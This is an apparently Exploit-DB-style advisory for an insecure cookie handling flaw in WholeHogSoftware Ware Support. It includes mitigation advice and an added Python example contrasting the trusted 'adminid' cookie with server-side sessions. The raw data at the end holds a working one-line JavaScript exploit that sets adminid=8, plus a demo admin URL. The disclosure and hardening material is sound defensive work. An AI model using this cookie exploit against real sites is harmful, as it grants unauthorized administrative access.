Vendor: Ware Support
By: Mountassif Moad
CVSS: 8.8 (HIGH)
Vulnerability: Insecure Cookie Handling
CWE: 614
Product Name: Ware Support
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability

WholeHogSoftware Ware Support is prone to an insecure cookie handling vulnerability that an attacker can exploit to gain administrative access to the application. The issue is exploited by setting the 'adminid' cookie to '8': the application then treats the request as coming from an administrator.

Mitigation:

Ensure that cookies are properly validated and sanitized before use.
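An added example, not code from Ware Support or from the original advisory: the flawed pattern the advisory describes (a raw 'adminid' cookie trusted as identity) next to a hardened form that keeps the identity on the server and gives the browser only an opaque random token. The admin table, session store, cookie name 'session' and TTL are assumptions made for the illustration.

```python
import secrets
import time

SESSION_TTL = 1800      # seconds; constructed value
ADMIN_IDS = {"8"}       # id taken from the advisory; the table itself is hypothetical
_sessions = {}          # token -> (admin_id, expiry); stands in for a server-side store


def is_admin_vulnerable(cookies):
    """Flawed pattern: the client-supplied 'adminid' value is trusted as identity."""
    return cookies.get("adminid") in ADMIN_IDS


def login(admin_id, password_ok, now=None):
    """Return a Set-Cookie value after a successful credential check, else None."""
    if not password_ok or admin_id not in ADMIN_IDS:
        return None
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)   # unguessable, carries no identity itself
    _sessions[token] = (admin_id, now + SESSION_TTL)
    return f"session={token}; Path=/; HttpOnly; Secure; SameSite=Strict"


def current_admin(cookies, now=None):
    """Hardened check: identity comes from the server-side store, never the cookie."""
    now = time.time() if now is None else now
    entry = _sessions.get(cookies.get("session", ""))
    if entry is None:
        return None                     # unknown token, or only a bare 'adminid'
    admin_id, expiry = entry
    if now >= expiry:
        _sessions.pop(cookies["session"], None)   # drop expired sessions
        return None
    return admin_id


def token_from_set_cookie(header):
    """Extract the token from the Set-Cookie value built by login()."""
    return header.split(";", 1)[0].split("=", 1)[1]
```

With the hardened check, a request carrying only `adminid=8` matches no stored session and is treated as unauthenticated.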

Exploit-DB raw data:

###########################################################################
[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability
[+] Script   :Ware Support
[+] Site     :http://wholehogsoftware.com
[+] Detail   :http://wholehogsoftware.com/index.php/page/ware_support
[+] Discovered By Mountassif Moad
[+] www.v4-team.com
[+] Greetz : All my Friends
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/support/admin/

# milw0rm.com [2009-02-03]